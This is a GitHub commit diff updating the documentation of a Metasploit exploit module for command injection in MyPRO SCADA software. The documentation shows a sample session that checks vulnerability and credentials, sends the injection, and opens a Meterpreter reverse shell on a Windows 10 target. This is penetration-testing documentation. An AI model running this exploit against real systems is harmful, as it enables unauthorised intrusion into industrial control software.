Skip to content

Commit 9bfaf63

Browse files
committed
Updated the module to take advantage of the check method
1 parent d7e50cb commit 9bfaf63

File tree

1 file changed

+5
-6
lines changed

1 file changed

+5
-6
lines changed

documentation/modules/exploit/windows/scada/mypro_cmdexe.md

Lines changed: 5 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -52,19 +52,18 @@ Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fe
5252
msf6 exploit(windows/scada/mypro_cmdexe) > exploit
5353
5454
[*] Started reverse TCP handler on 192.168.1.241:4444
55-
[*] Checking MyPRO version...
56-
[+] Version retrieved: 8.28.0
57-
[+] Version is vulnerable.
55+
[*] Running automatic check ("set AutoCheck false" to disable)
56+
[+] The target appears to be vulnerable.
5857
[*] Checking credentials...
5958
[+] Credentials are working.
6059
[*] Sending command injection...
61-
[*] Using randomly generated email address: UUuZCNFXIghJ@Lbruq.com
60+
[*] Using randomly generated email address: VfzbSXcISaX@fNavXU.com
6261
[*] Sending stage (201798 bytes) to 192.168.1.239
63-
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:49303) at 2024-07-22 16:17:57 -0400
62+
[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
6463
[*] Exploit finished, check thy shell.
6564
6665
meterpreter > shell
67-
Process 9252 created.
66+
Process 2632 created.
6867
Channel 1 created.
6968
Microsoft Windows [Version 10.0.19045.4651]
7069
(c) Microsoft Corporation. All rights reserved.

0 commit comments

Comments
 (0)